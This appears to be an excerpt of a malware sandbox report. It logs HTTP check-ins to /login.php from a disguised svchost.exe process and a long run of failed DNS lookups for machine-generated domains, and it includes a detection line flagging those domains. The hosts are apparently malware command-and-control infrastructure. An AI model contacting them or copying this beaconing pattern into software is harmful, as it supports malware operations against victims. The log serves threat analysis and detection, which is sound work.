Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: www.gahyqah.com Connection: Keep-Alive
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupydeq.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupycag.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galynuh.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyciz.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyxynyx.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qexyhuv.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vofycot.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php?subid1=20240908-1853-3379-8a1b-ce08bd3461b1 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww25.lyxynyx.com Connection: Keep-Alive Cookie: __tad=1725785613.7387215
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php?sub1=20240908-1853-34e6-b36e-a2256d9e0a9e HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww16.vofycot.com Connection: Keep-Alive Cookie: __tad=1725785614.8678415
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyhyg.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com
Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lygyvuj.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyhiz.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyfyj.com Cookie: sid=b166d882-6dbf-11ef-90a1-9c5e8dd41795
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: www.gahyqah.com Connection: Keep-Alive
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyxynyx.com Cookie: __tad=1725785613.7387215
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vofycot.com Cookie: __tad=1725785614.8678415
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php?subid1=20240908-1854-12c0-8240-bdabdc5d8efa HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww25.lyxynyx.com Connection: Keep-Alive Cookie: __tad=1725785613.7387215
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php?sub1=20240908-1854-132f-8c2f-134916a1e9d0 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww16.vofycot.com Connection: Keep-Alive Cookie: __tad=1725785614.8678415
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com
Source: unknownDNS traffic detected: English language letter frequency does not match the domain names
Source: unknownDNS traffic detected: query: puzypug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexysig.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumytup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahynus.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykyjux.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebylov.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofydac.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupytyl.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupydig.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexyriq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujyxyl.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufybyv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volydot.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyvah.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetytug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvyxil.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufymyg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purywop.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyrygyn.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonymuf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofyqit.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzyxyv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyrug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopyret.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujymip.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyvuv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galypyh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galyfyb.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexyxuv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqyzuw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumywaq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqyhuz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowydef.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqysag.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volykit.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonycum.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyxul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyrip.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacykeh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowybof.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyneh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxymed.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupypep.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryfyd.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxygax.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexyvoq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyhup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyhis.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysymux.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegyrol.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadypuw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqyvob.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyheq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekykup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocycuc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryxij.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexykug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volyzef.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyfaq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexyfel.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofygum.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahykih.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqykab.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonyzuf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvymul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyveg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofykoc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopycom.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykygaj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacykub.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojygok.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowykaf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowymyk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymyvin.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetyrap.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonydik.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofymik.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatycoh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvyjop.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowyzuk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purydyv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatyqih.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegytyv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojykom.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopykak.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxylor.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofygaf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymylyr.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedynaq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujygaq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatydaw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygywor.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysywon.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galyquw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysyvud.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysysod.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyrab.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegysoq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegynap.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufygug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvyliv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatyvyz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetyfop.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyfyq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purycap.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purydip.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyveb.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofybyf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetyvil.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvylod.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purycul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyfuh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonyjim.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonyqok.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volypum.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykymox.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galyhiw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedysov.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacypyz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupypiv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyxov.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purytyg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganydiw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryvex.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadycew.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzyjoq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykyvod.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufyjuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonypyf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqyzoh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqykog.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowydic.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocyrom.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyqow.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopyjuf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumyjig.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetylyv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volymum.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumybal.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocyzek.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumymuv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyrytun.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymymud.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetyquq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganycuh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galyvas.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykynyj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexyqog.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volymaf.com replaycode: Name error (3)
